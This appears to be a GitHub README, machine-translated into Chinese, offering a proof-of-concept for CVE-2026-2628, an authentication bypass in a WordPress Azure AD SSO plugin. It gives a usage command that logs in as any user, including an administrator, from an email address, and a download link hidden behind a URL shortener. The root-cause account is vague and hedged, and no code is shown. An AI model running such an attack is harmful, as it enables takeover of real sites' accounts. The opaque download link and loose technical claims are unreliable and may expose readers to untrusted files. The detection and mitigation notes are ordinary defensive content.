b1gchoi/CVE-2026-2628-PoC

GitHub: b1gchoi/CVE-2026-2628-PoC

Stars: 0 | Forks: 0

# Azure AD SSO 绕过 PoC - CVE-2026-2628 **插件:** All-in-One Microsoft 365 & Entra ID / Azure AD SSO Login **受影响版本:** ≤ 2.2.5 **CVSS:** 9.8 (严重) **CWE:** 288 - 使用备用路径或通道绕过认证 **影响:** 未经认证的远程攻击者可以无需凭据、Microsoft 登录或交互,以任何用户(包括管理员)身份登录。 ## 法律声明 仅供经授权的红队 / 渗透测试使用。请勿对您不拥有或未获得明确测试许可的系统使用。 ## 根本原因(简述) 该插件通过 `wp_authenticate` 过滤器注册了一个自定义认证处理程序,但当通过带有操纵参数的直接端点调用触发特制的“备用”登录流程时,未能正确验证认证请求的上下文 / 来源。 具体来说: - 正常的 Azure SSO 流程使用 OAuth/OpenID Connect 重定向 → 回调 → token 验证 → 用户映射 - 漏洞路径通过携带用户标识符(电子邮件或 uid)+ 薄弱 / 缺失的来源检查直接命中内部的“快速登录”或状态恢复处理程序,从而完全绕过了 token 验证。 在版本 ≤ 2.2.5 中,`handle_alternate_login()`(或类似的内部方法)未强制要求请求通过正确的 OAuth 流程发起 —— 它信任一个可以伪造的 `state` 或 `code` 参数,尤其是在结合缺失的 `is_sso_initiated` 标志检查时。 这创建了一个 `wp_authenticate` 接受的备用认证通道,而无需经过 Azure。 ## 利用条件 - 目标运行易受攻击的插件 (≤ 2.2.5) - 至少存在一个已知电子邮件的用户(非常常见 —— 管理员电子邮件通常是公开的或可猜测的) - 没有额外的保护措施(WAF、针对 wp-login 的 .htaccess 阻止等) ## 使用方法 - 运行:`python3 exploit.py https://target.com -e admin@target.com` 您将获得被冒充用户的有效 cookies(如果您选择管理员电子邮件,则为管理员)。 image ## 利用 **[下载 PoC Exploit](https://tinyurl.com/4cv7vxn5)** ## 详细分析 有关完整的技术细分、补丁差异提示和检测签名,请参阅 ANALYSIS.md。 ## 检测 - 在源代码中查找插件版本:`/wp-content/plugins/login-with-azure/readme.txt` - Grep 搜索易受攻击的函数名称:`moazure_handle_token`、`alternate_auth_flow` 等。 - 包含 `?moazure_alternate=1` 或类似内容的 HTTP 请求(日志记录) ## 缓解措施 - 更新至 ≥ 2.2.6 - 在修补前禁用该插件 - 尽可能阻止非浏览器 User-Agent 直接访问 `/wp-admin/admin-ajax.php` 或 `/wp-login.php` - 对所有管理员账户强制执行 2FA
标签:All-in-One Microsoft 365, Azure AD, Critical, CVE-2026-2628, CVSS 9.8, CWE-288, Entra ID, OAuth, OpenID Connect, POC, SSO, Web安全, WordPress插件, 提权, 数据展示, 文件完整性监控, 未授权访问, 红队, 编程工具, 蓝队分析, 身份验证绕过, 远程代码执行, 逆向工具